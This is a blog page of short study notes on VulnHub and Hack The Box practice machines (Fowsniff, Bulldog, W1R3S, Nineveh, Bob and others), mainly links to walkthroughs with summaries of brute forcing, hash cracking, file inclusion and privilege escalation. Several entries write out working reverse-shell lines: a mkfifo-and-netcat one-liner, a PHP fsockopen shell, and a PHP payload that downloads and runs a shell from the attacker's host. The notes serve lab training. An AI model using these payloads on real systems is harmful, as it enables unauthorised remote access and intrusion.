Skip to main content

Posts

56 VM Fowsniff: 1

Notes: A. https://www.hackingarticles.in/fowsniff-1-vulnhub-walkthrough/[imap and pop3 ports, access mailbox from cli, add python reverse shell to banner so when a user logs in , the banner runs and get root access, metasploit pop3 access Walkthru:
Recent posts

55 VM Bulldog 1

Walkthru : A. https://medium.com/@krankoPwnz/walkthrough-for-bulldog-on-vulnhub-com-c834573e28fd [passwowd hash in source, webshell with limited command but use || or && to run any command, crontab, python  reverse shell  for priv escalation ] B. https://securitybytes.io/vulnhub-com-bulldog-ctf-solution-b00b4640327a [pwd in binary file extract it using strings file] C. https://hack-ed.net/2017/11/09/bulldog-ctf-walkthrough/ [read files from webshell] D. https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ [upgrade shell] Notes: There was a crontab file that runs daily. I tried to add bash revershell, added user to sudoer file, php reveershe shell but non worked. but I was able to create a file using that crontab which lead me to believe it is possible to perform escalation using it. I used rm cmd to perform revershell reveres shell rm /tmp/f|mkfifo /tmp/f|cat /tmp/f|/bin/sh -i 2>&1|nc 172.16.1.100 1234 >/tmp/f nc -nvlp 1234

54 VM W1R3S: 1.0.1

Walkthru A. https://github.com/nbrisset/CTF/tree/master/CTF-VulnLabs/w1r3s [local file inclusion, ftp, Cuppa CMS  vulnerability   , LFI working using CLI but not browser, john,  sudo su for  privilege esclation  ] B. https://blog.barradell-johns.com/index.php/2018/06/25/w1r3s-writeup/ [ I was getting the same response from server for LFI . looks like it needed encoding. " After a bit of research I found I may have better luck with encoded url ( url  encoding ) params, so I utilised cURL" ] Notes:

53 VM Basic Pentest 2

Walkthru A. https://resources.infosecinstitute.com/basic-pentesting-2-ctf-walkthrough/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+infosecResources+%28InfoSec+Resources%29 [brute force passphrases for ssh login, convert private key to another format so we can use john to brute force key ] B. http://www.hackingarticles.in/hack-the-basic-pentesting2-vm-ctf-challenge/ [ use  ssh2john  to convert this SSH key into a crackable file for john the ripper. ] C. https://medium.com/@nelsoncoln/basic-pentesting-2-vm-walkthrough-383047900187 [ vim.basic have root permissions, that means that I could probably read the file in kay’s directory, ] Notes; [from walktheu B] python ssh2john key > ssh_login john ssh_login

52 VM DerpNStink: 1

Walkthru A. http://nixware.net/derpnstink-1-walkthrough [wordpress, wpscan, wordpress vuln, access via mysql user/pwd hashcat, pwd in pcap file, sudo user will get you root access but the file/dir in sudo doesnt exist so you have to create one dev reverse tcp ] B. https://amonsec.net/ctf/derpnstink-1-ctf-walkthrough [use private key ssh to login] Notes A. not sure how the password was cracked using hashcat. tried a single hash but didnt work. another hash worked  https://samsclass.info/seminars/CMS/hashcat-wordpress.htm

48 VM HTB Nineveh

Walkthru: A.https://v3ded.github.io/ctf/htb-nineveh.html [hydra brute force www, searchsploit php Lite Admin 1.9, hydra brute force https where username is irrevalant but just required to complete the command, php reverse shell, Create a database in phpLiteAdmin and table , directory traversal  ,  chkrootkit   privilege escalation bug,  port knocking ,  strings to extract key from png file  ] Notes: Unable to test it since the VM had static IP. Read Waltthru Make our own .txt backdoor file inside /var/www/html with <?php $sock=fsockopen("YOUR IP",1234);exec("/bin/sh -i <&3 >&3 2>&3");?> as the content Change Database  and add a table inside called shell, select 1 field: Name the field whatever we wish, set it as text type, put  <?php system("wget YOURIP/shell.txt -O /tmp/shell.php; php /tmp/shell.php"); ?>  into the default value & click create. This should create a new table with our exploit.  The default

47 VM Bob 1.0.1

Walkthru: A. http://www.hackingarticles.in/hack-the-bob-1-0-1-vm-ctf-challenge/[webshell, robotos.txt, reverse shell, combining two o/s commands using && and ||, hidden content/information, spawing a python shell, ssh on non default port, search for txt file, password in text file, gpg file where keys is first alphabets of the line of a file,] B. https://dangwasec.wordpress.com/2018/03/20/ctf-bob-1-0-1-walkthrough/ [burp] C. https://hackso.me/bob-1.0.1-walkthrough/ [PGPCrack-NG is a program designed to brute-force symmetrically encrypted PGP files not useful here] Notes: file notes.sh #!/bin/bash clear echo "-= Notes =-" echo "Harry Potter is my faviorite" echo "Are you the real me?" echo "Right, I'm ordering pizza this is going nowhere" echo "People just don't get me" echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>" echo "Cucumber" echo "Rest now your eyes are slee